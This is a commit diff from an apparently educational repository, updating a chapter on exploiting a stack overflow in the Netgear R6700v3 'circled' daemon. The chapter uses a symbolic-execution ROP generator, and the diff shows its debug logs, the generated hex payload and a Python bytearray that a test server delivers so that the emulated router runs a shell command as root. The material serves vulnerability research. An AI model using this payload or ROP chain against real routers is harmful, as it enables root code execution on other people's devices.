mirror of
https://github.com/cyber-defence-campus/netgear_r6700v3_circled
synced 2026-08-09 12:29:06 +00:00
Update section Exploitation
This commit is contained in:
+158
-150
@@ -17,6 +17,7 @@
|
||||
2. [Analysis Module morion_rop_generator](./6_exploitation.md#analysis-module-morion_rop_generator)
|
||||
1. [Payload Generation](./6_exploitation.md#payload-generation-1)
|
||||
2. [Run PoC Exploit](./6_exploitation.md#run-poc-exploit-1)
|
||||
3. [Getting a Reverse Shell](./6_exploitation.md#getting-a-reverse-shell)
|
||||
<!--TODO--------------------------------------------------------------------------------------------
|
||||
- [X] Can we integrate morion/circled.rop3.py to circled.server.py?
|
||||
- [X] Try out manual exploit
|
||||
@@ -29,6 +30,7 @@
|
||||
- [ ] Why do we have `var:s+0`?
|
||||
- [ ] Recheck links [Symbolic Execution: Analysis Modules](./4_symbex.md#analysis-modules)
|
||||
- [X] Update figure references (e.g. Figure 5.4)
|
||||
- [ ] Morion README: Intended usage - crash triage
|
||||
--------------------------------------------------------------------------------------------------->
|
||||
# Exploitation
|
||||
In this final chapter, we will show the usage of two **analysis modules** provided by
|
||||
@@ -431,13 +433,13 @@ pwndbg> continue
|
||||
If the PoC exploit worked, you will find a file `/id` on the emulated router (System:
|
||||
[ARMHF Guest (chroot)](./1_setup.md#armhf-guest-system)) with the content `uid=0 gid=0(root)`.
|
||||
## Analysis Module morion_rop_generator
|
||||
The above process to get a payload triggering the intended ROP chain is rather cumbersome, since we
|
||||
need to access register and/or memory ASTs manually to define the necessary model restrictions. That
|
||||
is where the module `morion_rop_generator` comes into play.
|
||||
The above process of getting a payload for the intended ROP chain is rather cumbersome, since we
|
||||
need to access register and memory ASTs manually, in order to define the required model
|
||||
restrictions. That is where the module `morion_rop_generator` comes into play.
|
||||
### Payload Generation
|
||||
Module `morion_rop_generator` allows us to define the intended ROP chain within the trace file
|
||||
`circled.yaml` and will do the rest automatically. For instance, we included the same ROP chain as
|
||||
depicted in Figure 6.1 in [circled.init.yaml](../morion/circled.init.yaml#L37) (named `default`):
|
||||
Module `morion_rop_generator` allows us to define the intended ROP chain within the trace file and
|
||||
does the rest automatically. For instance, we can include our ROP chain (depicted in Figure 6.1) in
|
||||
the file [circled.yaml](../morion/circled.init.yaml#L37) as shown below:
|
||||
```yaml
|
||||
[...]
|
||||
ropchains:
|
||||
@@ -469,119 +471,128 @@ ropchains:
|
||||
instruction:
|
||||
['0x0000c9bc', 'b7 f2 ff eb', 'bl #0x94a0', 'Gadget 1.1']
|
||||
```
|
||||
The module `morion_rop_generator` is then run like shown in the next excerpt. The module first
|
||||
symbolically executes the recorded trace and then tries to transfer control to the specified ROP
|
||||
chain. For each instruction in the chain it loads the given preconditions, tries to solve them,
|
||||
concretizes the found solution, symbolically executes the instruction and then proceeds with the
|
||||
next one. At the end of the chain, a potential payload is returned.
|
||||
**Note**: A trace file can include different ROP chains, differentiated by name. The ROP chain
|
||||
included in the above file, for instance, has the name `default`.
|
||||
|
||||
As can be seen below, the module `morion_rop_generator` is run by giving the trace file and the name
|
||||
of the intended ROP chain as command-line arguments. The module first symbolically executes the
|
||||
recorded trace and then tries to transfer control to the specified ROP chain. For each instruction
|
||||
in the ROP chain it then performs the following steps:
|
||||
- **Load** instruction's preconditions
|
||||
- **Solve** the loaded preconditions
|
||||
- **Concretize** the solution if one is found
|
||||
- **Execute** the instruction symbolically
|
||||
|
||||
If solutions for all the preconditions have been found and all instructions in the ROP chain have
|
||||
been processed, corresponding payloads are dumped.
|
||||
```
|
||||
$ morion_rop_generator circled.yaml default
|
||||
|
||||
[...]
|
||||
[2024-04-16 14:16:04] [DEBG] 0x0000cf1c (ff df 8d e2): add sp, sp, #0x3fc
|
||||
[2024-04-16 14:16:04] [DEBG] 0x0000cf20 (03 db 8d e2): add sp, sp, #0xc00
|
||||
[2024-04-16 14:16:04] [INFO] ... finished symbolic execution (pc=0x0000cf24).
|
||||
[2024-04-16 14:16:04] [INFO] Start loading preconditions of instruction 0 in ROP chain 'default'...
|
||||
[2024-04-16 14:16:04] [DEBG] Regs:
|
||||
[2024-04-16 14:16:04] [DEBG] Mems:
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc84c == 0xb8
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc84d == 0xc9
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc84e == 0x00
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc84f == 0x00
|
||||
[2024-04-16 14:16:04] [INFO] ... finished loading preconditions of instruction 0 in ROP chain 'default'.
|
||||
[2024-04-16 14:16:04] [INFO] Start solving preconditions of instruction 0 in ROP chain 'default'...
|
||||
[2024-04-16 14:16:04] [DEBG] Solution:
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc24c: 0xb8 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+392]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc24d: 0xc9 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+393]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc24e: 0x00 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+394]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc24f: 0x00 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+395]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc0c4: 0xff [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+0]
|
||||
[2024-04-16 14:16:04] [INFO] ... finished solving preconditions of instruction 0 in ROP chain 'default'.
|
||||
[2024-04-16 14:16:04] [INFO] Start concretizing preconditions of instruction 0 in ROP chain 'default'...
|
||||
[2024-04-16 14:16:04] [DEBG] Regs:
|
||||
[2024-04-16 14:16:04] [DEBG] Mems:
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc84c: 0xb8
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc84d: 0xc9
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc84e: 0x00
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc84f: 0x00
|
||||
[2024-04-16 14:16:04] [INFO] ... finished concretizing preconditions of instruction 0 in ROP chain 'default'...
|
||||
[2024-04-16 14:16:04] [INFO] Start symbolic execution of instruction 0 in ROP chain 'default'...
|
||||
[2024-04-16 14:16:04] [DEBG] 0x0000cf24 (f0 8f bd e8): pop {r4, r5, r6, r7, r8, sb, sl, fp, pc}# Gadget 0.0
|
||||
[2024-04-16 14:16:04] [INFO] ... finished symbolic execution of instruction 0 in ROP chain 'default'.
|
||||
[2024-04-16 14:16:04] [INFO] Start loading preconditions of instruction 1 in ROP chain 'default'...
|
||||
[2024-04-16 14:16:04] [DEBG] Regs:
|
||||
[2024-04-16 14:16:04] [DEBG] Mems:
|
||||
[2024-04-16 14:16:04] [INFO] ... finished loading preconditions of instruction 1 in ROP chain 'default'.
|
||||
[2024-04-16 14:16:04] [INFO] Start solving preconditions of instruction 1 in ROP chain 'default'...
|
||||
[2024-04-16 14:16:04] [DEBG] Instruction 1 of ROP chain 'default' has no preconditions.
|
||||
[2024-04-16 14:16:04] [INFO] ... finished solving preconditions of instruction 1 in ROP chain 'default'.
|
||||
[2024-04-16 14:16:04] [INFO] Start concretizing preconditions of instruction 1 in ROP chain 'default'...
|
||||
[2024-04-16 14:16:04] [DEBG] Regs:
|
||||
[2024-04-16 14:16:04] [DEBG] Mems:
|
||||
[2024-04-16 14:16:04] [INFO] ... finished concretizing preconditions of instruction 1 in ROP chain 'default'...
|
||||
[2024-04-16 14:16:04] [INFO] Start symbolic execution of instruction 1 in ROP chain 'default'...
|
||||
[2024-04-16 14:16:04] [DEBG] 0x0000c9b8 (06 00 a0 e1): mov r0, r6 # Gadget 1.0
|
||||
[2024-04-16 14:16:04] [INFO] ... finished symbolic execution of instruction 1 in ROP chain 'default'.
|
||||
[2024-04-16 14:16:04] [INFO] Start loading preconditions of instruction 2 in ROP chain 'default'...
|
||||
[2024-04-16 14:16:04] [DEBG] Regs:
|
||||
[2024-04-16 14:16:04] [DEBG] r0 == 0xbeffc290
|
||||
[2024-04-16 14:16:04] [DEBG] Mems:
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc290 == 0x69
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc291 == 0x64
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc292 == 0x3e
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc293 == 0x2f
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc294 == 0x69
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc295 == 0x64
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc296 == 0x3b
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc297 == 0x23
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc298 == 0x00
|
||||
[2024-04-16 14:16:04] [INFO] ... finished loading preconditions of instruction 2 in ROP chain 'default'.
|
||||
[2024-04-16 14:16:04] [INFO] Start solving preconditions of instruction 2 in ROP chain 'default'...
|
||||
[2024-04-16 14:16:04] [DEBG] Solution:
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc234: 0x90 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+368]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc235: 0xc2 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+369]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc236: 0xff [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+370]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc237: 0xbe [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+371]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc24c: 0xb8 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+392]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc24d: 0xc9 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+393]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc24e: 0x00 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+394]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc24f: 0x00 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+395]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc0c4: 0xff [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+0]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc290: 0x69 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+460]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc291: 0x64 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+461]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc292: 0x3e [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+462]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc293: 0x2f [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+463]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc294: 0x69 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+464]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc295: 0x64 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+465]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc296: 0x3b [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+466]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc297: 0x23 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+467]
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc298: 0x00 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+468]
|
||||
[2024-04-16 14:16:04] [INFO] ... finished solving preconditions of instruction 2 in ROP chain 'default'.
|
||||
[2024-04-16 14:16:04] [INFO] Start concretizing preconditions of instruction 2 in ROP chain 'default'...
|
||||
[2024-04-16 14:16:04] [DEBG] Regs:
|
||||
[2024-04-16 14:16:04] [DEBG] r0: 0xbeffc290
|
||||
[2024-04-16 14:16:04] [DEBG] Mems:
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc290: 0x69
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc291: 0x64
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc292: 0x3e
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc293: 0x2f
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc294: 0x69
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc295: 0x64
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc296: 0x3b
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc297: 0x23
|
||||
[2024-04-16 14:16:04] [DEBG] 0xbeffc298: 0x00
|
||||
[2024-04-16 14:16:04] [INFO] ... finished concretizing preconditions of instruction 2 in ROP chain 'default'...
|
||||
[2024-04-16 14:16:04] [INFO] Start symbolic execution of instruction 2 in ROP chain 'default'...
|
||||
[2024-04-16 14:16:04] [DEBG] 0x0000c9bc (b7 f2 ff eb): bl #0x94a0 # Gadget 1.1
|
||||
[2024-04-16 14:16:04] [INFO] ... finished symbolic execution of instruction 2 in ROP chain 'default'.
|
||||
[2024-04-16 14:16:04] [INFO] Start storing file 'circled.yaml'...
|
||||
[2024-04-16 14:16:06] [INFO] ... finished storing file 'circled.yaml'.
|
||||
[2024-04-16 14:16:06] [INFO] Start dumping payloads...
|
||||
[2024-05-02 07:52:51] [DEBG] 0x0000cf1c (ff df 8d e2): add sp, sp, #0x3fc #
|
||||
[2024-05-02 07:52:51] [DEBG] 0x0000cf20 (03 db 8d e2): add sp, sp, #0xc00 #
|
||||
[2024-05-02 07:52:51] [INFO] ... finished symbolic execution (pc=0x0000cf24).
|
||||
[2024-05-02 07:52:51] [INFO] Start loading preconditions of instruction 0 in ROP chain 'default'...
|
||||
[2024-05-02 07:52:51] [DEBG] Regs:
|
||||
[2024-05-02 07:52:51] [DEBG] Mems:
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc84c == 0xb8
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc84d == 0xc9
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc84e == 0x00
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc84f == 0x00
|
||||
[2024-05-02 07:52:51] [INFO] ... finished loading preconditions of instruction 0 in ROP chain 'default'.
|
||||
[2024-05-02 07:52:51] [INFO] Start solving preconditions of instruction 0 in ROP chain 'default'...
|
||||
[2024-05-02 07:52:51] [DEBG] Solution:
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc24c: 0xb8 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+392]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc24d: 0xc9 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+393]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc24e: 0x00 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+394]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc24f: 0x00 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+395]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc0c4: 0xff [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+0]
|
||||
[2024-05-02 07:52:51] [INFO] ... finished solving preconditions of instruction 0 in ROP chain 'default'.
|
||||
[2024-05-02 07:52:51] [INFO] Start concretizing preconditions of instruction 0 in ROP chain 'default'...
|
||||
[2024-05-02 07:52:51] [DEBG] Regs:
|
||||
[2024-05-02 07:52:51] [DEBG] Mems:
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc84c: 0xb8
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc84d: 0xc9
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc84e: 0x00
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc84f: 0x00
|
||||
[2024-05-02 07:52:51] [INFO] ... finished concretizing preconditions of instruction 0 in ROP chain 'default'...
|
||||
[2024-05-02 07:52:51] [INFO] Start symbolic execution of instruction 0 in ROP chain 'default'...
|
||||
[2024-05-02 07:52:51] [DEBG] 0x0000cf24 (f0 8f bd e8): pop {r4, r5, r6, r7, r8, sb, sl, fp, pc}# Gadget 0.0
|
||||
[2024-05-02 07:52:51] [INFO] ... finished symbolic execution of instruction 0 in ROP chain 'default'.
|
||||
[2024-05-02 07:52:51] [INFO] Start loading preconditions of instruction 1 in ROP chain 'default'...
|
||||
[2024-05-02 07:52:51] [DEBG] Regs:
|
||||
[2024-05-02 07:52:51] [DEBG] Mems:
|
||||
[2024-05-02 07:52:51] [INFO] ... finished loading preconditions of instruction 1 in ROP chain 'default'.
|
||||
[2024-05-02 07:52:51] [INFO] Start solving preconditions of instruction 1 in ROP chain 'default'...
|
||||
[2024-05-02 07:52:51] [DEBG] Instruction 1 of ROP chain 'default' has no preconditions.
|
||||
[2024-05-02 07:52:51] [INFO] ... finished solving preconditions of instruction 1 in ROP chain 'default'.
|
||||
[2024-05-02 07:52:51] [INFO] Start concretizing preconditions of instruction 1 in ROP chain 'default'...
|
||||
[2024-05-02 07:52:51] [DEBG] Regs:
|
||||
[2024-05-02 07:52:51] [DEBG] Mems:
|
||||
[2024-05-02 07:52:51] [INFO] ... finished concretizing preconditions of instruction 1 in ROP chain 'default'...
|
||||
[2024-05-02 07:52:51] [INFO] Start symbolic execution of instruction 1 in ROP chain 'default'...
|
||||
[2024-05-02 07:52:51] [DEBG] 0x0000c9b8 (06 00 a0 e1): mov r0, r6 # Gadget 1.0
|
||||
[2024-05-02 07:52:51] [INFO] ... finished symbolic execution of instruction 1 in ROP chain 'default'.
|
||||
[2024-05-02 07:52:51] [INFO] Start loading preconditions of instruction 2 in ROP chain 'default'...
|
||||
[2024-05-02 07:52:51] [DEBG] Regs:
|
||||
[2024-05-02 07:52:51] [DEBG] r0 == 0xbeffc250
|
||||
[2024-05-02 07:52:51] [DEBG] Mems:
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc250 == 0x69
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc251 == 0x64
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc252 == 0x3e
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc253 == 0x2f
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc254 == 0x69
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc255 == 0x64
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc256 == 0x3b
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc257 == 0x23
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc258 == 0x00
|
||||
[2024-05-02 07:52:51] [INFO] ... finished loading preconditions of instruction 2 in ROP chain 'default'.
|
||||
[2024-05-02 07:52:51] [INFO] Start solving preconditions of instruction 2 in ROP chain 'default'...
|
||||
[2024-05-02 07:52:51] [DEBG] Solution:
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc234: 0x50 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+368]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc235: 0xc2 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+369]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc236: 0xff [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+370]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc237: 0xbe [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+371]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc24c: 0xb8 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+392]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc24d: 0xc9 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+393]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc24e: 0x00 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+394]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc24f: 0x00 [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+395]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc0c4: 0xff [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+0]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc250: 0x69 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+396]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc251: 0x64 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+397]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc252: 0x3e [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+398]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc253: 0x2f [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+399]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc254: 0x69 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+400]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc255: 0x64 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+401]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc256: 0x3b [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+402]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc257: 0x23 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+403]
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc258: 0x00 [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+404]
|
||||
[2024-05-02 07:52:51] [INFO] ... finished solving preconditions of instruction 2 in ROP chain 'default'.
|
||||
[2024-05-02 07:52:51] [INFO] Start concretizing preconditions of instruction 2 in ROP chain 'default'...
|
||||
[2024-05-02 07:52:51] [DEBG] Regs:
|
||||
[2024-05-02 07:52:51] [DEBG] r0: 0xbeffc250
|
||||
[2024-05-02 07:52:51] [DEBG] Mems:
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc250: 0x69
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc251: 0x64
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc252: 0x3e
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc253: 0x2f
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc254: 0x69
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc255: 0x64
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc256: 0x3b
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc257: 0x23
|
||||
[2024-05-02 07:52:51] [DEBG] 0xbeffc258: 0x00
|
||||
[2024-05-02 07:52:51] [INFO] ... finished concretizing preconditions of instruction 2 in ROP chain 'default'...
|
||||
[2024-05-02 07:52:51] [INFO] Start symbolic execution of instruction 2 in ROP chain 'default'...
|
||||
[2024-05-02 07:52:51] [DEBG] 0x0000c9bc (b7 f2 ff eb): bl #0x94a0 # Gadget 1.1
|
||||
[2024-05-02 07:52:51] [INFO] ... finished symbolic execution of instruction 2 in ROP chain 'default'.
|
||||
[2024-05-02 07:52:51] [INFO] Start storing file 'circled.yaml'...
|
||||
[2024-05-02 07:52:53] [INFO] ... finished storing file 'circled.yaml'.
|
||||
[2024-05-02 07:52:53] [INFO] Start dumping payloads...
|
||||
Payload [inst:5132][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][var:s+0]:
|
||||
s+0000: 41 41 41 41 41 41 41 41
|
||||
[...]
|
||||
s+0360: 41 41 41 41 41 41 41 41
|
||||
s+0368: 90 c2 ff be 42 42 42 42
|
||||
s+0368: 50 c2 ff be 42 42 42 42
|
||||
s+0376: 42 42 42 42 42 42 42 42
|
||||
s+0384: 42 42 42 42 42 42 42 42
|
||||
s+0392: b8 c9 00 00
|
||||
@@ -590,34 +601,31 @@ Payload [inst:15451][mem][model:fgets@libc(s=0xbeffc0c4,n=1024,stream=0x21ae0)][
|
||||
s+0000: ff 43 43 43 43 43 43 43
|
||||
s+0008: 43 43 43 43 43 43 43 43
|
||||
[...]
|
||||
s+0448: 43 43 43 43 43 43 43 43
|
||||
s+0456: 43 43 43 43 69 64 3e 2f
|
||||
s+0464: 69 64 3b 23 00
|
||||
s+0384: 43 43 43 43 43 43 43 43
|
||||
s+0392: 43 43 43 43 69 64 3e 2f
|
||||
s+0400: 69 64 3b 23 00
|
||||
---
|
||||
[2024-04-16 14:16:06] [INFO] ... finished dumping payloads.
|
||||
[2024-05-02 07:52:53] [INFO] ... finished dumping payloads.
|
||||
```
|
||||
Since `fgets` was called twice in our trace (at trace instructions 5132 and 15451) the module
|
||||
returns two payloads, which however originate from reading the same file (`circleinfo.txt`). We
|
||||
therefore need to merge them so a single one. As before, we added the resulting payload to
|
||||
[circled.server.py](../server/circled.server.py#L57), which serves it when started with command-line
|
||||
argument `--payload "poc2"`.
|
||||
In our specific trace, all symbolic variables are introduced by function `fgets`, which, if you
|
||||
remember the discussions in [Vulnerability: Analysis](./5_vulnerability.md#analysis), is called
|
||||
twice (corresponding to trace instructions 5132 and 15451). For each of these calls,
|
||||
`morion_rop_generator` returns an individual payload. Since in our case these originate from the
|
||||
same read file (`circleinfo.txt`), what by the way is also confirmed by the same file stream
|
||||
(`0x21ae0`), we can simply merge the payloads together to a single one. As before, we added the
|
||||
resulting payload to [circled.server.py](../server/circled.server.py#L57), which serves it when
|
||||
started with command-line argument `--payload "poc2"`.
|
||||
```python
|
||||
[...]
|
||||
# Serve requests for circleinfo.txt
|
||||
[...]
|
||||
elif payload == "poc2":
|
||||
p = bytearray([
|
||||
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
|
||||
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
|
||||
[...]
|
||||
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
|
||||
0x90,0xc2,0xff,0xbe,0x42,0x42,0x42,0x42,
|
||||
0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,
|
||||
0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,
|
||||
0xb8,0xc9,0x00,0x00,0x43,0x43,0x43,0x43,
|
||||
0x43,0x43,0x43,0x43,0x43,0x43,0x43,0x43,
|
||||
[...]
|
||||
0x43,0x43,0x43,0x43,0x43,0x43,0x43,0x43,
|
||||
0x43,0x43,0x43,0x43,0x69,0x64,0x3e,0x2f,
|
||||
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
|
||||
0x50,0xc2,0xff,0xbe,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,
|
||||
0x42,0x42,0x42,0x42,0x42,0x42,0x42,0x42,0xb8,0xc9,0x00,0x00,0x69,0x64,0x3e,0x2f,
|
||||
0x69,0x64,0x3b,0x23,0x00
|
||||
])
|
||||
[...]
|
||||
@@ -658,37 +666,25 @@ pwndbg> stepi
|
||||
[...]
|
||||
|
||||
pwndbg> x/s $r6
|
||||
0xbeffc290: "id>/id;#"
|
||||
0xbeffc250: "id>/id;#"
|
||||
|
||||
pwndbg> continue
|
||||
[...]
|
||||
```
|
||||
If the PoC exploit worked, you will find a file `/id` on the emulated router (System:
|
||||
[ARMHF Guest (chroot)](./1_setup.md#armhf-guest-system)) with the content `uid=0 gid=0(root)`.
|
||||
|
||||
## TODO
|
||||
- Explain `circled.server.py`
|
||||
- Test reverse shell payload
|
||||
- Explain reverse shell payload
|
||||
- Add screencast
|
||||
[circled.server.py](../server/circled.server.py#L42)
|
||||
## Getting a Reverse Shell
|
